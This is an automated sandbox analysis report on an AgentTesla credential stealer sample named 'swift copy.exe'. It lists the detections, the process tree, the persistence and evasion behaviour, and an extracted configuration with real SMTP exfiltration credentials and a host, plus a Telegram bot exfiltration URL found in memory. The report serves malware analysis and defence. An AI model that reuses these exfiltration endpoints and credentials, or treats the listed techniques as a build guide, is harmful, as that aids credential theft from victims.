Loading ...

Play interactive tourEdit tour

Analysis Report swift copy.exe

Overview

General Information

Sample Name:swift copy.exe
Analysis ID:323804
MD5:d1173f90f82de7d1730939bd45027f6e
SHA1:02dab2d2e93317cf1eee0eba45d8ef6bc3641f74
SHA256:43d68057ba4990638dbfe0cf81f0fc6078d431e5574624d1a0ecd7abc413f90f
Tags:AgentTeslaexe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM_3
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
May check the online IP address of the machine
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • swift copy.exe (PID: 6028 cmdline: 'C:\Users\user\Desktop\swift copy.exe' MD5: D1173F90F82DE7D1730939BD45027F6E)
    • RegSvcs.exe (PID: 4652 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • kprUEGC.exe (PID: 3940 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kprUEGC.exe (PID: 4680 cmdline: 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe' MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "1n6oW8N", "URL: ": "http://KGcFUsjPPNQUPKk.net", "To: ": "", "ByHost: ": "mail.cglgumrukleme.com:587", "Password: ": "7QggoKZ0", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.599743364.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.352877677.0000000002F42000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000001.00000002.602855902.0000000002FF8000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: RegSvcs.exe.4652.1.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "1n6oW8N", "URL: ": "http://KGcFUsjPPNQUPKk.net", "To: ": "", "ByHost: ": "mail.cglgumrukleme.com:587", "Password: ": "7QggoKZ0", "From: ": ""}
              Multi AV Scanner detection for submitted fileShow sources
              Source: swift copy.exeVirustotal: Detection: 31%Perma Link
              Source: swift copy.exeReversingLabs: Detection: 56%
              Machine Learning detection for sampleShow sources
              Source: swift copy.exeJoe Sandbox ML: detected
              Source: 1.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49718 -> 78.142.210.93:587
              May check the online IP address of the machineShow sources
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: global trafficTCP traffic: 192.168.2.6:49718 -> 78.142.210.93:587
              Source: Joe Sandbox ViewIP Address: 23.21.42.25 23.21.42.25
              Source: Joe Sandbox ViewIP Address: 23.21.42.25 23.21.42.25
              Source: Joe Sandbox ViewASN Name: VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficTCP traffic: 192.168.2.6:49718 -> 78.142.210.93:587
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: RegSvcs.exe, 00000001.00000002.602855902.0000000002FF8000.00000004.00000001.sdmpString found in binary or memory: http://KGcFUsjPPNQUPKk.net
              Source: RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://KsvFwe.com
              Source: RegSvcs.exe, 00000001.00000002.602975649.000000000301E000.00000004.00000001.sdmpString found in binary or memory: http://cglgumrukleme.com
              Source: RegSvcs.exe, 00000001.00000002.606083554.0000000005D65000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: RegSvcs.exe, 00000001.00000002.602105310.0000000002DAD000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
              Source: RegSvcs.exe, 00000001.00000002.606061708.0000000005D4C000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.
              Source: RegSvcs.exe, 00000001.00000002.602975649.000000000301E000.00000004.00000001.sdmpString found in binary or memory: http://mail.cglgumrukleme.com
              Source: RegSvcs.exe, 00000001.00000002.602105310.0000000002DAD000.00000004.00000001.sdmp, RegSvcs.exe, 00000001.00000002.606083554.0000000005D65000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: swift copy.exe, 00000000.00000002.352520521.0000000002D01000.00000004.00000001.sdmp, RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
              Source: RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/
              Source: RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
              Source: swift copy.exe, 00000000.00000002.354262247.0000000003D53000.00000004.00000001.sdmp, RegSvcs.exe, 00000001.00000002.599743364.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
              Source: RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
              Source: RegSvcs.exe, 00000001.00000002.602105310.0000000002DAD000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: swift copy.exe, 00000000.00000002.354262247.0000000003D53000.00000004.00000001.sdmp, RegSvcs.exe, 00000001.00000002.599743364.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443

              Spam, unwanted Advertisements and Ransom Demands:

              barindex
              Modifies the hosts fileShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C6015C NtQueryInformationProcess,
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C60AF1 NtQueryInformationProcess,
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C60470
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C6C94C
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C60E18
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C67B48
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C6C580
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C60E08
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C6114D
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C6FAB9
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C67B38
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_02C6DC48
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_0634BC18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02B747A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02B74790
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06136508
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06136850
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_061390D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06137120
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06490B70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06499040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06494428
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0649DC30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0649450A
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0613BF48 appears 48 times
              Source: swift copy.exe, 00000000.00000000.333768768.000000000095A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameu0LV.exeP vs swift copy.exe
              Source: swift copy.exe, 00000000.00000002.352520521.0000000002D01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenAEDpSFmkPDnkqMKrmffcWDowDYVNkG.exe4 vs swift copy.exe
              Source: swift copy.exe, 00000000.00000002.356697487.0000000006130000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs swift copy.exe
              Source: swift copy.exeBinary or memory string: OriginalFilenameu0LV.exeP vs swift copy.exe
              Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@7/6@4/2
              Source: C:\Users\user\Desktop\swift copy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\swift copy.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
              Source: swift copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\swift copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\swift copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: swift copy.exeVirustotal: Detection: 31%
              Source: swift copy.exeReversingLabs: Detection: 56%
              Source: unknownProcess created: C:\Users\user\Desktop\swift copy.exe 'C:\Users\user\Desktop\swift copy.exe'
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe 'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\swift copy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: C:\Users\user\Desktop\swift copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: swift copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: swift copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: RegSvcs.pdb, source: kprUEGC.exe, 00000004.00000000.420400884.0000000000DF2000.00000002.00020000.sdmp, kprUEGC.exe, 00000006.00000002.439304557.00000000005F2000.00000002.00020000.sdmp, kprUEGC.exe.1.dr
              Source: Binary string: RegSvcs.pdb source: kprUEGC.exe, kprUEGC.exe.1.dr
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_00876C8E push edi; retf
              Source: C:\Users\user\Desktop\swift copy.exeCode function: 0_2_00873C8A pushad ; iretd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0613F182 push esp; retf
              Source: initial sampleStatic PE information: section name: .text entropy: 7.2849303293
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kprUEGCJump to behavior

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe:Zone.Identifier read attributes | delete
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\swift copy.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
